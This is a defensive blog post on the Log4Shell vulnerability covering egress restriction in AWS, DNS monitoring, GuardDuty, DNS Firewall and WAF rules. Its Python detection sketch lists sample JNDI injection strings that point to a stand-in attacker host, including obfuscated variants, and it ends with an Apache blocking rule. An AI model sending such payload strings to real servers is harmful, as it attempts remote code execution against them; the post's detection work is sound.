There’s a great XKCD cartoon entitled Dependency that cuts to the heart of today’s software engineering world: developers (and in turn organisations) everywhere love using libraries to accelerate their development efforts, particularly if that library is free to use, which typically means free and open source.

The image speaks about large, complex systems, critical to organisations, that rely entirely on the unpaid, thankless contributors who maintain these libraries.

In the last week, we’ve seen Log4j, a Java logging utility, come under such focus due to a critical remote code execution bug in which the server side can be triggered into making outbound requests. A vast number of Java-based solutions built over the last 15+ years depend on this library for logging messages.

It’s led to articles like “The Internet is on Fire” by the Australian Broadcasting Corporation, and thousands of posts on infosec-specific news sites (eg: Kaspersky, PortSwigger, SecurityScorecard, BleepingComputer).

Java is widely used, as Oracle Corporation points out clearly:

There are two sides to this: invalid requests coming in that should be handled with sensible data validation, and the resulting external requests that servers can be tricked into making.

Now I am not saying everyone should use their own logging library; that would be even more on fire. But we should stand ready to update these things rapidly, and we should help with either code contributions or financial donations (or both) to help improve this for the common good.

Untrusted Data Validation

Validating untrusted data sources is critical. The content of a local configuration file is vastly different from the query from the Internet. I’ve often joked about setting my Browser user-agent string to the EICAR test file content, used as a dummy value to trigger Antivirus software to match on this text.

In this case, we have remote attackers stuffing custom generated data strings in HTTP requests (and email and other sources that accept external traffic/data) to try and trick the Log4j library into processing and interpreting this data instead of just writing it to a log file.

Web servers always accept data from the Internet, and Web Application Firewalls can offer some protection, but in this case, the actual “string to check” can be escaped, making it harder to write simple rules that match.
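To make the escaping problem concrete, here is a minimal Python sketch of why a plain substring rule misses obfuscated strings. The function names are hypothetical. The two nested-lookup forms it unwraps (`${lower:x}`/`${upper:x}` and `${anything:-default}`) are only a sample of the publicly reported tricks. Treat it as an illustration of the cat-and-mouse problem, not as a complete detection rule.

```python
import re
from urllib.parse import unquote

MARKER = "${jndi:"

# Innermost ${lower:x} / ${upper:x} lookups, which evaluate to x (case-changed).
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# Innermost ${anything:-default} lookups, which fall back to the default text.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def naive_match(value: str) -> bool:
    """The 'simple rule': a case-insensitive substring check."""
    return MARKER in value.lower()


def normalise(value: str) -> str:
    """URL-decode once, then unwrap nested lookups until nothing changes."""
    value = unquote(value)
    previous = None
    while previous != value:
        previous = value
        value = _CASE_LOOKUP.sub(lambda m: m.group(1), value)
        value = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), value)
    return value


def looks_like_jndi_lookup(value: str) -> bool:
    """Heuristic: check the decoded string and its unwrapped form."""
    decoded = unquote(value)
    return MARKER in decoded.lower() or MARKER in normalise(value).lower()


if __name__ == "__main__":
    samples = [
        "${jndi:ldap://attacker.example/a}",
        "${${lower:j}ndi:ldap://attacker.example/a}",
        "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}",
        "%24%7Bjndi:ldap://attacker.example/a%7D",
    ]
    for sample in samples:
        print(naive_match(sample), looks_like_jndi_lookup(sample), sample)
```

Only the first sample is caught by the naive check, while the heuristic flags all four. An attacker only needs one form the rule author did not anticipate, which is why filtering alone is not a fix.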

Restricting outbound traffic

An attacker is often trying to get better access into the systems they target; their initial foothold may be tentative. In this example, the ability to trick a target server into fetching additional data (a payload) from an external service is key. There are two main types of external data egress: direct, and indirect.

In the direct model, your server, which you installed and thus trust, may be running behind a firewall, but have you checked if you have restrictions on what it can fetch directly from the Internet?

In AWS, the default Security Group egress rule permits all traffic; this is a terrible idea, but it follows the principle of least surprise for those new to the AWS VPC environment. It is strongly recommended that you pare this down for all applications, to end up with only the minimum network access you need, even when behind a (managed) NAT Gateway or routing rules, and even if you think your server only has internal network access.
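As a rough way to find groups that still carry the permit-all default, the sketch below scans a security group description for egress rules open to the whole Internet. It assumes the dictionary shape that the EC2 DescribeSecurityGroups API returns (`IpPermissionsEgress`, `IpRanges`/`CidrIp`, `Ipv6Ranges`/`CidrIpv6`). The function name and the sample group ID are made up for illustration.

```python
from typing import Any, Dict, List


def open_egress_rules(security_group: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return the egress rules that allow traffic to any IPv4 or IPv6 address."""
    open_rules = []
    for rule in security_group.get("IpPermissionsEgress", []):
        any_v4 = any(r.get("CidrIp") == "0.0.0.0/0" for r in rule.get("IpRanges", []))
        any_v6 = any(r.get("CidrIpv6") == "::/0" for r in rule.get("Ipv6Ranges", []))
        if any_v4 or any_v6:
            open_rules.append(rule)
    return open_rules


# Hypothetical sample: a group that still has the default "all protocols, anywhere" rule.
default_like_group = {
    "GroupId": "sg-0123456789abcdef0",
    "IpPermissionsEgress": [
        {"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
    ],
}

# Hypothetical sample: a group pared down to database traffic on a local range.
restricted_group = {
    "GroupId": "sg-0fedcba9876543210",
    "IpPermissionsEgress": [
        {
            "IpProtocol": "tcp",
            "FromPort": 3306,
            "ToPort": 3306,
            "IpRanges": [{"CidrIp": "10.0.0.0/24"}],
            "Ipv6Ranges": [],
        },
    ],
}

if __name__ == "__main__":
    for group in (default_like_group, restricted_group):
        print(group["GroupId"], "open egress rules:", len(open_egress_rules(group)))
```

Feeding it the output of a real describe call across all your groups gives a quick list of candidates for tightening.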

I wrote a whitepaper on this topic for Modis in 2019 about Lateral Movement within the AWS VPC, and some of the concepts there are relevant now.

Your VPC-deployed virtual machine instance probably only needs to initiate connections to S3 on 443, and its database server on the local CIDR (address) range. For example, if you have three Subnets for databases:

- 10.0.0.0/26 (Databases in AZ-A)

- 10.0.0.64/26 (Databases in AZ-B)

- 10.0.0.128/26 (Databases in AZ-C)

- 10.0.0.192/26 (reserved for future expansion of Databases in a yet-to-be announced AZ-D)



… and are running MySQL (eg, RDS MySQL) in those AZs, then you probably want an egress rule on your Application Server/instance of 10.0.0.0/24:3306. (Note, be ready for making this all IPv6 in future). However, your inbound rule on the same group is probably referential to your managed Load Balancer, on port 443.
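The arithmetic behind that single egress rule can be checked with Python’s standard `ipaddress` module. This sketch assumes the fourth block starts on the /26 boundary at 10.0.0.192. The rule dictionary mirrors the shape EC2 uses for `IpPermissions` entries, but nothing here calls AWS, and the description text is invented.

```python
import ipaddress

# The four database subnets, one /26 per Availability Zone.
database_subnets = [
    ipaddress.ip_network(cidr)
    for cidr in ("10.0.0.0/26", "10.0.0.64/26", "10.0.0.128/26", "10.0.0.192/26")
]

# Four contiguous /26 blocks collapse into one /24 summary range.
summary = list(ipaddress.collapse_addresses(database_subnets))

# One egress rule for MySQL covering all current and reserved database subnets.
egress_rule = {
    "IpProtocol": "tcp",
    "FromPort": 3306,
    "ToPort": 3306,
    "IpRanges": [{"CidrIp": str(summary[0]), "Description": "MySQL to database subnets"}],
}

if __name__ == "__main__":
    print(summary)
    print(egress_rule)
```

A side benefit: `ip_network` raises `ValueError` for a CIDR whose address is not on its prefix boundary, which is a cheap way to catch typos in a subnet plan.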

What about DNS and Time Sync?

If you have cut down your egress to just two rules (HTTPS, for bootstrapping from S3 and for CFN-init to signal ASG creation, plus database traffic), what about things like DNS and time? These are typically UDP-based (ports 53 and 123).

Indeed, the typical firewall rule used for NTP, when syncing from external time services, is *:123 inbound and *:123 outbound. Ouch.

AWS Time Sync Service

The good news is you do not need to permit this in your security group rules IF you are using the AWS VPC-provided Time Sync service and DNS resolvers. These are available over the link-local network, and security groups do not restrict this traffic; hence your rules can stay closed for UDP ports 53 and 123.

This time service is also scalable; you don’t need to have thousands of hosts pointing at one or two of your own NTP servers. The AWS Time Sync service runs from the hypervisor, so as you add instances, you have more physical nodes (droplets) involved in providing it, and your time services scale with you.
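One way to confirm a host really relies on the link-local time source is to scan its NTP client configuration for anything else. The sketch below assumes chrony is the client and uses 169.254.169.123, the IPv4 link-local address AWS documents for the Time Sync service. The function name and the sample configuration are hypothetical.

```python
import ipaddress
from typing import List

AWS_TIME_SYNC_IPV4 = "169.254.169.123"


def external_time_sources(chrony_conf: str) -> List[str]:
    """List configured time sources other than the link-local Time Sync address."""
    sources = []
    for line in chrony_conf.splitlines():
        tokens = line.split("#", 1)[0].split()  # ignore comments and blank lines
        if len(tokens) >= 2 and tokens[0] in ("server", "pool", "peer"):
            if tokens[1] != AWS_TIME_SYNC_IPV4:
                sources.append(tokens[1])
    return sources


# Hypothetical configuration mixing the link-local source with a public pool.
sample_conf = """
# time sources
server 169.254.169.123 prefer iburst
pool pool.ntp.org iburst
"""

if __name__ == "__main__":
    # The Time Sync address sits in the link-local range 169.254.0.0/16.
    print(ipaddress.ip_address(AWS_TIME_SYNC_IPV4).is_link_local)
    print(external_time_sources(sample_conf))
```

Any source this reports needs outbound UDP 123, which is exactly the rule you are trying not to open.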

Managed & Scalable DNS Resolution

DNS can be used for data exfiltration. If you run your own DNS resolver (eg, on Windows Domain Controller(s) or Linux host(s)) and set your DHCP to hand this resolver address to clients, then you may be at risk of not even seeing this happen. This is an indirect way of being exploited; your end server may not have access to egress to the Internet, but it can egress to your DNS resolver to… well, look up addresses. If you do run your own DNS server, you should be looking at the log of what is being looked up, matching this against a threat list, and issuing warnings of potential compromise.
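If you do review your own resolver logs, the matching step might look something like this Python sketch. It flags a queried name when it, or any parent domain, appears on a threat list, and also when a single label is unusually long (a common sign of data being encoded into lookups). The function names, the 40-character threshold, and the example domains are all assumptions for illustration. Parsing your resolver’s actual log format is left out.

```python
from typing import Iterable, List, Set, Tuple


def is_listed(qname: str, threat_domains: Set[str]) -> bool:
    """True if the name or any of its parent domains is on the threat list."""
    labels = qname.rstrip(".").lower().split(".")
    return any(".".join(labels[i:]) in threat_domains for i in range(len(labels)))


def suspicious_queries(
    queries: Iterable[str], threat_domains: Set[str], max_label_len: int = 40
) -> List[Tuple[str, List[str]]]:
    """Return (query name, reasons) for every lookup worth a warning."""
    findings = []
    for qname in queries:
        reasons = []
        if is_listed(qname, threat_domains):
            reasons.append("threat-list match")
        if any(len(label) > max_label_len for label in qname.rstrip(".").split(".")):
            reasons.append("unusually long label")
        if reasons:
            findings.append((qname, reasons))
    return findings


if __name__ == "__main__":
    threat_list = {"bad.example"}  # hypothetical threat feed
    observed = [
        "db.internal.example.",
        "updates.bad.example.",
        ("a" * 50) + ".tunnel.example.",
    ]
    for name, why in suspicious_queries(observed, threat_list):
        print(name, why)
```

The hard part in practice is keeping the threat list current and acting on the warnings, which is where a managed service earns its keep.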

Managed DNS Security Checks: GuardDuty

If that’s too much effort, then there is a managed solution for this: Amazon GuardDuty and the VPC-provided DNS resolver. In order for GuardDuty to inspect and warn on this traffic, you must be sending DNS queries via the VPC resolver. Turning on GuardDuty while not sending DNS traffic through the AWS-provided service (for example, by running your own root-resolving DNS server) means the DNS warnings from GuardDuty will probably never trigger.

By contrast, having your self-managed resolver (eg, an Active Directory server) use the VPC resolver means that it is the one that will be reported upon when any other instance uses it as a resolver for a risky lookup! I’m sure that will cause a mild panic.

Managed DNS Proactive Blocking: DNS Firewall

Going beyond simply telling you retrospectively that traffic happened is proactively blocking DNS traffic. Route 53 Resolver DNS Firewall was introduced in 2021, and can use managed block lists of malicious domains. This gives some level of protection: clients (instances) get a failed DNS lookup when trying to resolve these bad domains.

My Recommendations

So here’s the approach I recommend to my teams when using VPCs:

- Always use the link-local Time Sync service; it scales, and reduces SPOFs and bad firewall rules.

- Always use the link-local DNS resolver; it scales. Use a Resolver Rule if you then need to hook the DNS traffic up to your own DNS server (AD Domain Controller).

- Turn on GuardDuty, and set up notifications of the Findings it generates.

- Turn on DNS Firewall to actively BLOCK DNS lookups for bad domains.

- Turn on your own Route 53 query logs, with some retention period (90 days?)

- For inbound Web traffic, use a managed Web Application Firewall with managed rules, and/or scope your application to the country you’re intending to serve traffic to. In particular, block access to administrative URL paths that don’t come from trusted source ranges.

- Leverage any additional managed services that you can, so you minimise the hand-crafted solutions in your application.

- Template your workload, and implement updates from template automation; no local changes. Deploy changes rapidly using DevOps principles. Socialise with your team/management the importance of full stack maintenance and least privilege access (including at the network layer, for both ingress and egress), and schedule and prioritise time to address technical debt in each iteration, including the updating of every third party library in your app.

- If you have a DevOps pipeline with something like SonarQube or WhiteSource, have it report on dependencies (libraries), and get reports on how out-of-date those libraries are, and/or whether those out-of-date versions have known CVEs against them. Google Lighthouse (in the browser) does a great job of this for JavaScript web frameworks.

For this exploit you need to go wider than what you run in the cloud: your company printer (MFP), network security cameras, VoIP phones, UPS units, air-conditioners, Smart Hubs, TVs, Home Internet Gateways, and other devices will probably have an update. So will your games console, and the games on it (this started from an update in Minecraft to address this and has… escalated quickly!). Even the physical on-prem firewalls and virtual appliances themselves need attention, but ensure you don’t just do firewalls and ignore the larger landscape of equipment you have.

PS: I highly recommend my colleague Elliot Segler’s recent post entitled Learnings with AWS WAF and Log4Shell.

PPS: You may want to apply something like this to Apache:

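    <IfModule mod_rewrite.c>
        RewriteEngine On
        # Match a URL-encoded "{jndi:" anywhere in the request line, ignoring case
        RewriteCond %{THE_REQUEST} ^.*%7Bjndi:.* [NC]
        # Answer matching requests with 403 Forbidden and stop processing rules
        RewriteRule ^(.*)$ - [F,L]
    </IfModule>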